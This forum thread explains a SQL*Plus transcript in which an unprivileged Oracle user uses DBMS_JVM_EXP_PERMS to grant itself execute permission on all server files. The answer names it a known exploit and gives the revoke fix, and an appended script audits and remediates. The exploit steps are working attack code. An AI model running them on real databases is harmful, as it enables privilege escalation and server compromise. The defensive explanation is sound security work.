  1. #1
    Join Date
    Mar 2010
    Posts
    1

    Question Unanswered: Can anyone explain what this code does?

    I am trying to figure out what is going on with this code. I am doing a presentation for college, but I have little experience with databases. This project is on the zero-day hack of Oracle 11g, and I need to explain what is happening in the following code. Thanks for the help.

    Code:
    SQL> CONNECT / AS SYSDBA 
    Connected. 
    SQL> CREATE USER GREMLIN IDENTIFIED BY GREMLIN; 
     
    User created. 
     
    SQL> GRANT CREATE SESSION TO GREMLIN; 
     
    Grant succeeded. 
     
    SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = 
    'GREMLIN'; 
     
    no rows selected 
     
    SQL> CONNECT GREMLIN/GREMLIN 
    Connected. 
    SQL> DECLARE 
       POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; 
       CURSOR C1 IS SELECT 
    'GRANT','GREMLIN','SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL;
      BEGIN
      OPEN C1; 
      FETCH C1 BULK COLLECT INTO POL; 
      CLOSE C1; 
      DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); 
      END; 
      / 
     
    PL/SQL procedure successfully completed. 
     
    SQL> CONNECT / AS SYSDBA 
    Connected. 
    SQL> COL TYPE_NAME FOR A30; 
    SQL> COL NAME FOR A30; 
    SQL> COL ACTION FOR A10; 
    SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = 
    'GREMLIN'; 
     
    TYPE_NAME                      NAME                           ACTION 
    ------------------------------ ------------------------------ ---------- 
    java.io.FilePermission         <<ALL FILES>>                  execute 
     
    SQL>

  2. #2
    Join Date
    Mar 2010
    Location
    Vienna, Austria
    Posts
    149
    It is the first part of the exploit of a bug in the default installation of Oracle 10g & 11g (execute permission on the DBMS_JVM_EXP_PERMS package is given to PUBLIC).

    It gives a user with nothing but the CREATE SESSION privilege the possibility to do file operations with the Oracle JVM on the server machine.

    This was introduced at the last Black Hat conference by David Litchfield.

    (The solution is to revoke the execution privilege for the DBMS_JVM_EXP_PERMS package from PUBLIC, which every responsible DBA should have done by now anyway ...)
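
A DBA-side check and cleanup for the condition the answer describes, as an added example that is not part of either post: it looks for the PUBLIC execute grant, lists file permissions already planted in the Java policy table, applies the revoke from the answer, and removes the row shown in the question. The allow-list of expected grantees is an assumption to adapt; GREMLIN is the test account from the question.

```sql
-- Added audit/remediation example (not from the thread). Run as SYSDBA in SQL*Plus.

-- 1. Is the package still executable by PUBLIC (the default the answer describes)?
SELECT grantee, owner, table_name, privilege
  FROM dba_tab_privs
 WHERE table_name = 'DBMS_JVM_EXP_PERMS'
   AND privilege  = 'EXECUTE'
 ORDER BY grantee;

-- 2. Has the package already been used? List enabled file permissions held by
--    accounts outside an allow-list. The allow-list below is an assumption:
--    replace it with the grantees you expect on your own system.
COL grantee   FOR A20
COL type_name FOR A30
COL name      FOR A30
COL action    FOR A10
SELECT seq, kind, grantee, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE type_name = 'java.io.FilePermission'
   AND kind      = 'GRANT'
   AND enabled   = 'ENABLED'
   AND grantee NOT IN ('SYS', 'SYSTEM', 'JAVASYSPRIV', 'JAVAUSERPRIV', 'JAVA_ADMIN')
 ORDER BY grantee, seq;

-- 3. The fix named in the answer: no unprivileged session can call the package.
REVOKE EXECUTE ON SYS.DBMS_JVM_EXP_PERMS FROM PUBLIC;

-- 4. Revoking the package grant does not undo policy rows imported earlier.
--    Revoke the exact permission shown in the question's final query.
BEGIN
  DBMS_JAVA.REVOKE_PERMISSION(
    'GREMLIN',                       -- grantee from the question
    'SYS:java.io.FilePermission',    -- type schema:type name
    '<<ALL FILES>>',                 -- permission name
    'execute');                      -- action
END;
/

-- 5. Verify: both counts should be 0 once steps 3 and 4 have succeeded.
SELECT (SELECT COUNT(*) FROM dba_tab_privs
         WHERE table_name = 'DBMS_JVM_EXP_PERMS'
           AND grantee = 'PUBLIC' AND privilege = 'EXECUTE') AS public_execute,
       (SELECT COUNT(*) FROM dba_java_policy
         WHERE grantee = 'GREMLIN' AND enabled = 'ENABLED'
           AND type_name = 'java.io.FilePermission')         AS gremlin_file_perms
  FROM dual;
```

Step 2 matters on systems that were exposed before the revoke: any row it returns for an account that should hold only CREATE SESSION is worth investigating.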
